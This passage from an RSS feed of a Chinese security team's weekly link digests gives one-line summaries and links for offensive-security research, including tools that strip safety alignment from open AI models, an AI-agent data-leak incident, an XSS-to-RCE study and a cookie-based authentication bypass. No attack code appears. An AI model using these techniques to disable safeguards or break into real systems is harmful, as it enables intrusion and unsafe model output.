href="https://openai.com/index/why-codex-security-doesnt-include-sast" target="_blank">https://openai.com/index/why-codex-security-doesnt-include-sast</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Ramp公司使用AI代理在6天内自动修复约100个安全漏洞，无需人工干预</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://builders.ramp.com/post/100-vulnerabilities-patched-with-0-humans" target="_blank">https://builders.ramp.com/post/100-vulnerabilities-patched-with-0-humans</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Heretic：一个自动“去安全对齐”的工具，可对大模型进行消审查处理，使其减少拒答并输出原本受限制的内容</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/p-e-w/heretic" target="_blank">https://github.com/p-e-w/heretic</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OBLITERATUS：一个能够快速移除开源AI模型安全限制的工具，包括Hugging Face上的详细技术文章和代码实现</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/elder-plinius/OBLITERATUS" target="_blank">https://github.com/elder-plinius/OBLITERATUS</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Trajan：开源CI/CD工具，覆盖传统CI/CD漏洞如流水线投毒和秘密泄露，以及AI/LLM流水线漏洞</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.praetorian.com/blog/building-bridges-breaking-pipelines-introducing-trajan" target="_blank">https://www.praetorian.com/blog/building-bridges-breaking-pipelines-introducing-trajan</a></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/praetorian-inc/trajan" target="_blank">https://github.com/praetorian-inc/trajan</a></span></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">麦肯锡AI代理被黑客攻击导致大量敏感数据泄露的事件分析</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.thestack.technology/mckinsey-ai-agent-hacked-lilli" target="_blank">https://www.thestack.technology/mckinsey-ai-agent-hacked-lilli</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">其他</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">mcp-windbg：一个将AI模型与WinDbg调试器连接的MCP服务器，用于崩溃转储分析和远程调试</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/svnscha/mcp-windbg" target="_blank">https://github.com/svnscha/mcp-windbg</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">RSigma：将YAML规则解析为AST并针对JSON日志进行实时模式检测和关联分析</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://mostafa.dev/pattern-detection-and-correlation-in-json" target="_blank">https://mostafa.dev/pattern-detection-and-correlation-in-json</a></span><span style="box-sizing: border-box;"><span leaf="">-</span></span><span leaf="">logs-fab16334e4ee</span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关于解决逆向工程中供应商依赖问题的研究文章</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://slcyber.io/research-center/hyoketsu-solving-the-vendor-dependency-problem-in-re" target="_blank">https://slcyber.io/research-center/hyoketsu-solving-the-vendor-dependency-problem-in-re</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011113" src="https://wechat2rss.xlab.app/img-proxy/?k=2ea5be1f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jClvsgHo290bFrtdcgrSyas4El6mn9QfwUvjo7zCjDJotuHZkJjcvRZoRo877n2nTLfZxbicCfjWKKGJH96YmdqzPGShPhoPxINk%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9145907473309609" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011112" src="https://wechat2rss.xlab.app/img-proxy/?k=d2bc52b5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCl3PUibA21CuSG4JefUUgtUyXia1nZjzpq4xk0YpzjibibbkUAbcIqD21XmISIEzT2bqgg9gmSptZPyObdM5pWEyReWUibWuMKa3Xns%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div><div style="margin: 10px 0% 0px;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 10px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 17px;padding: 0px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">往期推荐</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494751&amp;idx=1&amp;sn=06f539727afaa65f36aa707fce4d3d8a&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.3.7-2026.3.13）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.3.7-2026.3.13）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494746&amp;idx=1&amp;sn=9dea57e1f5651252cff076bd01d30209&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.2.28-2026.3.6）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.2.28-2026.3.6）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494720&amp;idx=1&amp;sn=82df42a422757d53c5053087f96dc2b1&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.2.7-2026.2.27）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.2.7-2026.2.27）</a></span></p></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=6906f15d&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494762%26idx%3D1%26sn%3Dca8490675064f1b8b18de2a02a4134b5">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 20 Mar 2026 18:02:00 +0800</pubDate>
    </item>
    <item>
      <title>天元实验室岗位招聘</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494757&amp;idx=1&amp;sn=642a5a4b37a6a3ff0eb74b43c27ddf20</link>
      <description></description>
      <content:encoded><![CDATA[<p><span>M01N Team</span> <span>2026-03-14 17:43</span> <span style="display: inline-block;">陕西</span></p>






  
  
  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=3981db22&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jCnHSKwCsQ5kDlHUJvDORwk084LibJOOkl3AqRiclr4DqicjtMbjEtZYj3Hn7VibXPeEBwle6fLq1dkcl0Ff5MPsPeelgyq9Ad1WtA0%2F0%3Fwx_fmt%3Djpeg"/></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=dfde2b22&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494757%26idx%3D1%26sn%3D642a5a4b37a6a3ff0eb74b43c27ddf20">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 14 Mar 2026 17:43:00 +0800</pubDate>
    </item>
    <item>
      <title>每周蓝军技术推送（2026.3.7-2026.3.13）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494751&amp;idx=1&amp;sn=06f539727afaa65f36aa707fce4d3d8a</link>
      <description>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-03-13 18:01</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=a972b10c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FTPGibEO8KBwbD5z6C0g2NAp2OicEl3fdbRrPUY2MuWIcreXMC0tGBdfWBviaqDPPyN63iawoWIujD6l1Fx5keMUib4w%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100011100" data-ratio="0.4222222" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=cfc123b2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jClIKrfm7KHSauzubZiasx9AQfzYN7zDecsWGjDI7S1kGyQob8BBBh2Z4roZg2z9mI0icA5eLnfg1zDYo7n0lyp1oSNkxWK8iblf3A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;color: rgb(62, 62, 62);padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">Web安全</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">分析Tauri桌面应用框架的安全风险，探讨XSS到RCE的攻击路径</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://bishopfox.com/blog/beyond-electron-attacking-alternative-desktop-application-frameworks" target="_blank">https://bishopfox.com/blog/beyond-electron-attacking-alternative-desktop-application-frameworks</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">通过手动插入HTTP cookie绕过认证，访问某工程学院招生系统并泄露4110名学生敏感信息</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://eaton-works.com/2026/03/09/skcet-hack/" target="_blank">https://eaton-works.com/2026/03/09/skcet-hack/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍用于解析Microsoft Graph batch请求的Burp Suite扩展工具，帮助分析Azure Portal网络流量</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://kknowl.es/posts/untangling-microsoft-batch/" target="_blank">https://kknowl.es/posts/untangling-microsoft-batch/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;color: rgb(62, 62, 62);padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">内网渗透</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">DRACARYS：基于GOAD框架的AD域渗透测试挑战</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a 